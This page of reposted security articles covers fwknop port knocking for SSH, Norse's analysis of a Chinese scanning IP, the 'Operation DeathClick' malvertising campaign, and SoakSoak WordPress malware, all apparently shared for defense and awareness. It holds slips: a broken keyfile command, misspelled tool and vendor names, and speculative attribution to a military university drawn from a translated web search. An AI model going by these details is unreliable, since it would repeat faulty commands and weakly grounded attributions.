Afterwards access to the SSH server will be prohibited. If we scan port 22 again, we’ll see it’s filtered. To instruct fwknop to add appropriate iptables rules to allow access to the server, we have to execute the command below, where the must be substituted with the server’s IP address and needs to be substituted with PCAL_FILTER port where the knock will be sent to. # fwknop --server-port <port> --access 'tcp/22' --source-ip --destination <ip> After running the command, we’ll have to provide the KEY secret key, which was set in the /etc/fwknop/access.conf configuration file. Entering the password to the fwknop command every time before gaining access to the server would be tedious, which is why we can save the password to .knock-keyfile and it will be automatically applied to the fwknop command. To do that we first have to save the password to the .knock-keyfile in our home directory, where the needs to be substituted with the IP of the server and the with the actual secret knock key. # cat "<ip>: <key>" >> ~.knock-keyfile When running the fwknop command, we should use an additional –get-key parameter to instruct fwknop to read the .knock-keyfile, which contains the secret key. # fwknop --server-port <port> --access 'tcp/22' --source-ip --destination <IP> --get-key ~/.knock-keyfile Conclusion In this article we’ve presented different ways of protecting and hardening our SSH server. Since the SSH server is quite often one of the few services available in a public cloud environment, it’s important to properly secure it by using different security implications. By following the tutorial above, attackers won’t be able to determine whether the SSH server is present or not, let alone bruteforcing the password or using any other attack vector to cause harm or possibly gain access to the system. References [1] sshd_config – OpenSSH SSH daemon configuration file, UNIX man pages : sshd_config (5). Source
  23. Aerosol
    Recently, the Norse DarkWolf Labs noted that the IP address 218.77.79.43 had jumped into the top quadrant for malicious activity. Investigation into the activity and the IP itself highlights the many challenges in accurately attributing such events to known actors, as illustrated in this article. The IP – assigned to the CHINANET-HN-HY CHINANET-HN Hengyang node network, Hunan Telecom on ASN 4134 for China Telecom – had been seen targeting multiple ports and protocols over several months, and had been increasing activity in the last week of August. From June 11, 2014 to August 26, 2014 the Norse threat intelligence platform observed over 706,000 events from this IP, with between 7,200 and 10,600 unique events each day. There had been minimal variance in the number of observed Thursdays through Mondays, and the total number for Tuesdays and Wednesdays were significantly less by comparison during that time frame. The number of events gradually increased over the following weeks, with over 70,200 during one week alone: Figure One (1): 218.77.79.43 activity timeline, August 2014 The source port selection is in the 32000 to 62000 range for this activity, with the destination having a consistent pattern targeting nine distinct ports (21, 22, 23, 25, 53, 80, 443, 3389, and 8080) as displayed in Figure Two (2). Note the number of events targeting each port are relatively equivalent: Figure Two (2): 218.77.79.43 destination port breakdown, August 2014 The activity observed indicates multiple timed and ongoing scans were occurring, with overlapping activity on the other targeted ports. The scans occurred over a six hour interval with subsequent bursts detected a few hours later. Figure Three (3) shows a detailed view of the targeted destination ports below 1024, which display distinct patterns: Figure Three (3): Destination Ports below 1024, August 2014 Further investigation revealed that the IP 218.77.79.43 creating this activity had been the subject of quite a bit of chatter and documentation across the Web. Researching the IP might leave one with the impression that this was merely a Linux system with only SSH open – as was seen when it was scanned by another researcher on August 14th.This appears to be an older and not updated Linux system, considering OpenSSH 5.3 was released on October 1, 2009. The IP in question had been submitted forty-three times to URLQuery since June 17th, 2014, with many instances showing IDS hits for being on the DShield Block Listed Source group. DShield shows similar activity starting around the same time in mid-June of 2014. The IP is also listed on ips.backscatterer.org as well as on blockedservers.com and badips.com. This is not the first time our researchers have found a system with no public facing resources or protocols that was scanning the rest of the Internet in a systematic fashion – nor will this be the last. There are few barriers to prevent an individual or organization from setting up a system and using open source toolsets to systematically scan and attack the rest of the Internet, as long as they have an “understanding” hosting provider. Considering the sudden increase activity has been ongoing since mid-June, it is a good assumption that the Hengyang node network of Hunan Telecom on ASN 4134 for China Telecom is being quite lenient about this customer’s activities. Following our first examination of this malicious IP, Norse DarkWolf Labs noted that 218.77.79.43 continued to hold the top spot for malicious activity, with over 66,550 events between August 26 and September 2. Though the total events observed during this period reflected a slight decrease in observed activity from the previous week, this IP was most certainly continuing to target multiple ports and protocols, as it had been doing over the last few months. Figure Four (4) focuses on the destination port timeline and frequency, showing the intervals of activity targeting the respective ports and protocols over this second sample period: Figure Four (4): Destination Port Activity Timeline, August – September 2014. In one of the subsequent online conversations regarding our early analysis, one security professional expressed concern regarding all traffic from this ISP, and considering CHINANET is the sole ISP for the entire country, it makes any subjective analysis quite problematic. DarkWolf Labs found that limiting the analysis to the specific Autonomous System (AS) Number 4134 proved quite interesting, with 2,981,300 events observed from over 213,500 different IP addresses in just six months. Note that AS 4134 is not limited to Hunan Telecom or the Hunan providence, as there are hundreds of organizations and subsidiary ISPs of CHINANET using this AS Number for routing. For comparison, Figure Five (5) breaks down the top twenty organizations for observed activity between January and August, 2014, for AS 4134. The CHINANET HUNAN PROVINCE NETWORK was clear down at number 11 in the rankings, with other providences surpassing its suspect activity: Figure Five (5): Top Twenty (20) Organizations For Observed Activity, January – August 2014. In an effort to better understand the activity from Hunan province, Figure Six (6) plots out the locations and amount of activity detected for the province. Note the overwhelming amount of activity from around Changsha (28°10’44.4?N 113° 06’50.4?E), far surpassing any of the other observed activity for this region. This reveals geolocation coordinates similar to those derived from the Regional Internet Registry (RIR) information for the IP address in question (218.77.79.43), and they are located either in or very near what appears to be a major waterway, the Liuyang River: Figure Six (6): Figure Three: Hunan Province Source IP Locations and amount of Activity, Jan – Aug 2014. In an attempt to provide attribution, by using Google Translate the DarkWolf Labs took “people’s liberation army + Changsha” and obtained the Chinese translation. Searching for these terms in Google comes up with the National University of Defense Technology (NUDT), just a short distance away from the coordinates provided by the RIR: Figure Seven (7): Satellite View of National University of Defense Technology (NUDT) From Google Earth The main entrance of the campus is at the northern most point, as depicted in the following image posted on Panoramio.com by zxpsectrum16k: Figure Eight (8): Photo of Campus Entrance The following week, it came as no surprise that the IP address 218.77.79.43 remained in the top aggressor list for suspect activity, with over 55,180 unique events detected between the 3rd and 8th of September, 2014. After some more initial analysis was released, one of our readers reached out to the team inquiring as to the attribution of this IP address, sharing with us the Network Threat Blacklist System web site of the Northeastern UniversityNetwork Center in Shenyang City, Liaoning Province. The System shows 218.77.79.43 as being part of Hengyang Telecom ADSL, which had been seen hitting their systems repeatedly as well. Figure Nine (9) below shows a screenshot from the Northeastern University Network Center Network Threat Blacklist System web site enumerating the most current “top ten” threats, with 218.77.79.43 ranking at eighth: Figure Nine (9): Screenshot from Northeastern University Network Center Network Threat Blacklist System web site This raises the question as to who or what this IP address is really assigned to. The Northeastern University Network Center attributes this IP as Hengyang Telecom ADSL, but the information we receive from the Regional Internet Registry (RIR) regarding this IP is not nearly as concise. As the screenshot in Figure Ten (10) indicates, there is no mention of Hengyang Telecom ADSL. The RIR provides the city as Changsha with a latitude and longitude nearby, and the ISP as CHINANET HUNAN PROVINCE NETWORK with the AS Name & Number as CHINANET-BACKBONE. Hengyang province is a considerable distance from Hunan province and the city of Changsha: Figure Ten (10): Screenshot from Norse DarkViking regarding IP 218.77.79.43 With the operators failing to provide truthful information regarding IP ownership and routing, the RIRs also cannot provide accurate information, and any attribution analysis can only as accurate as the information provided. It is interesting to note that internal to China, the information seems to be more accurate than what is available from the RIRs – perhaps because it was purposefully being skewed at the RIR. Considering CHINANET is the ISP for the entire country, if ownership and routing information is not accurate or is falsified, it makes subjective analysis extremely problematic at best. Clearly this IP is being a nuisance by scanning both internal and external hosts, and there should be concern regarding all traffic from this ISP – and potentially from this country in general – if activity of this nature continues to be tolerated. With the activity observed from this province being just number eleven in the rankings, the members of DarkWolf Labs are curious to know what we will find in the activity from the other provinces, and will continue monitoring this activity to provide analysis and additional information to help others recognize and defend against this malicious activity. Mitigations From a technical perspective, having a multi-layered defense is key to detecting and stopping malicious activity early, which also helps with overall detection rates, thus minimizing the impact to an organization when defenses fail. A good methodology to start with for any organization would be the Council on CyberSecurity’s 20 Critical Security Controls, which are geared towards addressing the key threats confronting networks today, as they are continuously being reviewed and updated. An additional measure in your multi-layered defense is ensuring network and system monitoring and detection is in place through your IDS/IPS, with the alerts being fed into your log management/SIEM solution for review, analysis, and potential action. Furthermore, organizations can take proactive action regarding suspect actors conducting scanning/reconnaissance of your infrastructure by using host based tools such as DenyHosts, FailToBan, or a Windows platform equivalent. A more robust, supportable solution and force multiplier would be leveraging a robust threat intelligence (TI) platform, enabling you to block these miscreants and associated activity at your network boundaries, and clearly identify them in your log management/SIEM solution for review, analysis, and potential action according to your specific security policies and acceptable level of risk. Source
  24. Aerosol
    The era of spear phishing and the waterhole attack, which uses social engineering, has come to an end. Hackers are now moving their tricky brains towards targeted Malvertising — a type of attack that uses online advertising to spread malware. A recent campaign termed “Operation death click” displays a new form of cyber-attack focused on specific targets. The attack is also defined as micro targeted malvertising. In this newly targeted variation of malvertising, the hackers are attacking their victims using micro targeting techniques and real time bidding — a recent technology that helps to post ads based on user interests. Until now, this type of attacks mainly focused on US defense companies, but they will spread to all financial and government sectors soon. Real time bidding plays a vital role in this attack. This technique has the ability to micro target ad delivery based on versions of Flash, OS, Java and browser. As per the latest analysis, researchers concluded that this type of attack is much more difficult to patch than a zero day vulnerability. Operation DeathClick has a micro targeting system that uses IP address ranges, zip codes, and interests of users (stored in cookies) to target specific companies, company types and user interests. Thus, it doesn’t matter which site you are browsing or which antivirus you installed. If bidding is done properly, ad windows will get displayed on targeted sites which redirect visitors to malicious sites that can install malwares and backdoor Trojans on the victim’s computer. What is Operation DeathClick? Operation death click is an advanced persistent threat (APT) targeting the US defense industry. Invanciea, a security firm, detected this attack and named it Operation DeathClick (ODC). It uses social engineering, malvertising and real time bidding as the main tools. It mainly uses digital advertising targeting technology to find victims. ODC is also defined as micro targeted malvertising — a combination of malvertising with targeted attacks. How Operation DeathClick is Carried Out Operation DeathClick is mainly carried out using three tools: Social engineering Malvertising Real time bidding Social Engineering Social engineering is the process of luring people into giving up confidential information. The sort of information these criminals are exploiting can vary, but when individuals are targeted, the attackers mainly focus on collecting their passwords, bank account information, etc. Criminals use social engineering tactics because it is an easier method to trick people rather than hacking by using some software. Security is all about knowing who and what to trust. Ask any security professional, and they will tell you that the weakest link in the security chain is the human who accepts a person or scenario at face value. Different social engineering attacks include email from a friend, phishing attacks, baiting scenarios, creating distrust, etc. Malvertising Malvertising is a process of placing an advertisement on the Internet that infects the victim’s computer with malware. As per the analysis of different security firms, malvertising is the popular computer hijacking technique which is widely used for organized crime. Once the system is attacked, it will be a part of botnet which will be used to carryout illegal activities. Malvertising Techniques Legitimate advertisements: Initially, attackers will create ads which are trustworthy, then will place this series of malware-free ads on a trusted site that supports third party ads. He will leave these ads as they are for several months so that frequent users will trust that theses links are safe. Later on, the attacker will inject malicious codes to these ads, which can install different type of Trojans or malware onto the victim’s computer. Pop-up ads: A pop-up ad can deliver malware once it appears on the screen. There are also malwares that can get installed to the system once we press the close button of the pop-up window. How Malvertising Works Attackers use different techniques to inject malicious code to their ads. Direct purchase: Attackers will act as the representatives from a trusted organization and purchase ad spaces directly with the websites. Leverage ad Exchanges: Attackers will post their ads in some ad network that provides ad spaces to websites. This automated process of ad distribution makes it difficult to identify the source of ad as well as in which sites they are published. Exploit technical vulnerabilities: Attackers will use some vulnerability to compromise ad networks, DSP, etc. They will then replace the legitimate ads with some malicious codes which can be sent out to any number of destinations. Real Time Bidding The traditional ways of online advertising have many faults. For advertisers, buying impressions in bulk using the CPM model is not very efficient, and for publishers, 70% of their inventory remains unsold. So a new approach is implemented, called RTB (real time bidding). RTB is a method of buying and selling online ad impressions through real-time auctions that occur in the time it takes a webpage to load. Ad exchange or supply side platforms are the most used bidding methods. It uses per impression context and targets the ads to specific people based on data about them. Real time bidding is a dynamic bidding process where each impression is a bid. Real time bidding makes it easier for ad networks to buy the inventory they want. In RTB, every online ad impression is evaluated, bought and sold, all independently and spontaneously. It helps both exchangers and buyers to work together to place bids on ads and to sell those ads. RTB also ensures that the ad has the right content and it is forwarded to the right person at the right time, rather than displaying ads widely. Real time bidding is used currently in Web and mobile platforms and social networking sites, and it is defined as a part of the future ad market. How It Works When a user visits a website, a bid request is generated, which includes site information, user information, browsing history and location. This information is then passed to an ad exchange, which helps to collect info from inventories. The ad exchange places this as an auction to the advertisers to find who is ready to pay the highest price for it. Then the winning bidder’s ad will get displayed in the browser. The whole process happens within milliseconds. Attack Process Before starting the attack, or as an initial stage of attack, an attacker must know about the victim and his environment. Session hijacking, also known as cookie hijacking, is a method of taking over a Web user session by obtaining the session ID and masquerading as the authorized user. Mainly there are three methods by which cookie hijacking is done: Session Fixation Session Fixation is an attack where the attacker sets a user’s session ID to one which is known to him. By understanding the methods used in the target web site, different types of techniques (like cross site scripting) can be utilized to fix the session ID value. Once the session ID of the victim is fixed, the attacker will wait for that victim to login. Once the user logs in, the attacker uses the predefined session ID value to assume the same online identity. Generally speaking, there are two types of session management systems when it comes to ID values. The first type is “permissive” systems that allow web browsers to specify any ID. The second type is “strict” systems that only accept server-side-generated values. Permissive systems’ session IDs are maintained without contact with the web site. Session Fixation attack can be mounted against any web site that uses sessions to identify authenticated users. Most of the Web sites are cookie-based. Unfortunately, cookie-based sessions are easier to attack. In contrast to stealing a users’ session IDs after they have logged into a web site, session fixation uses a different technique in which the active part of the attack takes place before a user logs in. Side Jacking Side jacking is the method of stripping someone’s access to a website. Packet sniffers are mainly used to do this, which will obtain an unencrypted cookie that will grant access to a specific website, such as webmail, Gmail, etc. This helps the attacker to act like the actual user. Once the session is logged off, the attacker loses access, because in this type of attack getting the user’s username and password is not possible, and when the next authentication (logging in with the correct username and password combination) is required, the bad actor loses access. SSl is one of the important methods used to do encryption, but many sites do not encrypt data after login and therefore are open to this type of security attack. Cross Site Scripting (XSS) Cross site scripting is a computer security vulnerability mostly found in web applications. XSS helps attackers to inject malicious codes to the client side script which will be viewed by other users. VBScript, ActiveX, HTML, and Flash are the main scripts used in cross site scripting to inject into a vulnerable dynamic page to fool the user. This type of scripts is executed on his machine in order to gather data. XSS might compromise private information, steal cookies, inject malicious code, etc. Data is usually formatted as a hyperlink that contains malicious code which will circulate over the Internet. Once cookie hijacking is done, the attacker will come to know what the user interested in, etc. Based on this analysis, advertisements are created. Once advertisements are created, placing them on the targeted website is a difficult task. Real time bidding is the method used nowadays for advertisements. Many intermediates like inventories, ad exchanges, etc. are present in the process cycle of real time bidding. So it is a great challenge for an attacker to overcome all this and to be the highest bid, because only the highest bid will get displayed on the webpage. So in order to overcome this, the attacker will try to compromise the network. Once the collection of cookies is finished, then he will create or download an ad which the victim is interested in, and he will inject malicious code into it. So once the user loads the page, the malicious ad will be displayed and once he clicks on that, he will be directed to some other page which will install a backdoor Trojan to his system, and will make that system to act as a part of a botnet. Diagram Explanation Different stages of the attack are explained in the above diagram: a) Using session hijacking techniques, the attacker will collect information about the victim who is working in ABC company. He comes to know that the victim is interested in anti-aging creams. The attacker may download or create some ad which is closely related to anti-aging creams and will embed it with some malicious codes or unwanted redirections. c) Using attack methods, the attacker will somehow compromise the bidding network and make his ad as the highest bid (in certain cases, the attacker may go for a direct purchase). d) Once the user gets into his company site, he will find this ad about anti-aging creams. e) User clicks on the ad. f) User will be redirected to unwanted pages, which will install backdoor Trojans in his system and will make him part of botnets. Screen Shots Invanciea found ODC in some US defense companies. Screenshots of the vulnerable sites perpetrated against the defense firms are posted below. Fleaflicker.com Gpokr.com webmail.com Detection Network data and host file data can be monitored to detect DeathClick attacks. A combination of open source tools such as Snort, Splunk and Squirt can be used to monitor the network and to find some potential attacks. Some of the factors associated with this type of APT attacks: Change in network traffic and outbound transfers Transfer of huge amounts of data not during office hours to external locations. Queries to dynamic DNS names. Unwanted searchers for files and locations. To/fro communication with external IP addresses. Uses API calls and recognized proxy to make external access. Router, firewall and other device configurations are changed. Increased number of IDS events. Snort: Snort is an intrusion detection and prevention system which is used widely. Snort can analyze real time traffic as well as packet logging on IP networks. It can also perform protocol analysis, content searching and matching, buffer overflows, portscans, CGI, etc. Snort has three modes: Sniffer: read and display network packets on the console. Packet Logger: program will log packets to the disk. Intrusion detection: monitor network traffic and analyze against a rule set. Scapy: Scapy can create different types of packets based on protocols. It mainly uses Python scripts and can be used for various types of detection. It can send, receive, and match requests from packets. OSSEC: an intrusion detection system, mainly host-based. Log analysis, file integrity, rootkit detection and alerting can be performed using correlation and analysis engine. It has an active support and can work on most operating systems. Splunk: Logs and other data information are collected from servers and various network devices. It can be used to search, monitor, and create graphs and reports. Squil: Squil GUI helps to access session data, raw packet data, real time events, etc. It also helps for various security monitoring and event-driven analysis. Squirt: a web application that helps to view and query data. It provides additional context to events with the help of metadata, time series representations, weighted and logically grouped result sets. Mitigation These types of attacks are detailed and multiphase in nature, so it seems impossible to prevent, but organizations can take some preventive measures. Many researchers advise that APT attacks like DeathClick can be mitigated to a certain extent by following best security practices. Companies should test their protection mechanism regularly to check whether it is working properly. Organizations should also have a vulnerability management system that can quickly mitigate any system attacks. Prioritizing contents based on their importance is one of the best ways that all organizations should take. The most sensitive and profitable data should be protected using efficient security measures. Mitigation always lies as a problem in APT attacks. Most of the zero day attacks will have patches, but for this type of attack, finding a patch is not possible. So the mitigation process remains more complex. But some of the techniques that we can adopt to cure such attacks are: Keep up to date with the threat landscape — make sure that the whole security team is aware of recent attacks and how they take place Prevent social engineering techniques through education — making everyone aware of the policies Update network based security services: review all SSL, IPSec and VPN connections and make sure that the users have access only to the internal network. Get updated with Next Gen Firewalls Advance threat detection appliances — make sure they are taking appropriate measures to detect zero day malwares and other attacks Email and web content security Automated monitoring, correlation and analysis Use proper sandbox testing methods DNS based intelligence Sandbox analysis for unknown threats References APT Detection Indicators – Part 2 | Nige the Security Guy Source
  25. Aerosol
    The users of WordPress, a free and open source blogging tool as well as content management system (CMS), are being informed of a widespread malware attack campaign that has already compromised more than 100,000 websites worldwide and still counting. The news broke throughout the WordPress community earlier Sunday morning when Google blacklisted over 11,000 domains due to the latest malware campaign, that has been brought by SoakSoak.ru, thus being dubbed the ‘SoakSoak Malware’ epidemic. While there are more than 70 million websites on the Internet currently running WordPress, so this malware campaign could be a great threat to those running their websites on WordPress. Once infected, you may experience irregular website behavior including unexpected redirects to SoakSoak.ru web pages. You may also end up downloading malicious files onto your computer systems automatically without any knowledge. The search engine giant has already been on top of this infection and has added over 11,000 websites to their blacklist that could have seriously affected the revenue potential of website owners, running those blacklisted websites. The security team at the security firm Sucuri, which is actively investigating the potential vector of the malware, said that the infections are not targeted only at WordPress websites, but it appears that the impact seems to be affecting most hosts across the WordPress hosting spectrum. SoakSoak malware modifies the file located at wp-includes/template-loader.php which causes wp-includes/js/swobject.js to be loaded on every page view on the website and this “swobject.js” file includes a malicious java encoded script malware. If you run any website and are worried about the potential risk of the infection to your website, Sucuri has provided a Free SiteCheck scanner that will check your website for the malware. The exact method of intrusion has not been pointed out at this time, but numerous signals led to believe us all that many WordPress users could have fallen victim to this attack. However, if you are behind the Website Firewall, CloudProxy, you are being protected from the SoakSoak malware campaign. Source
×
×
  • Create New...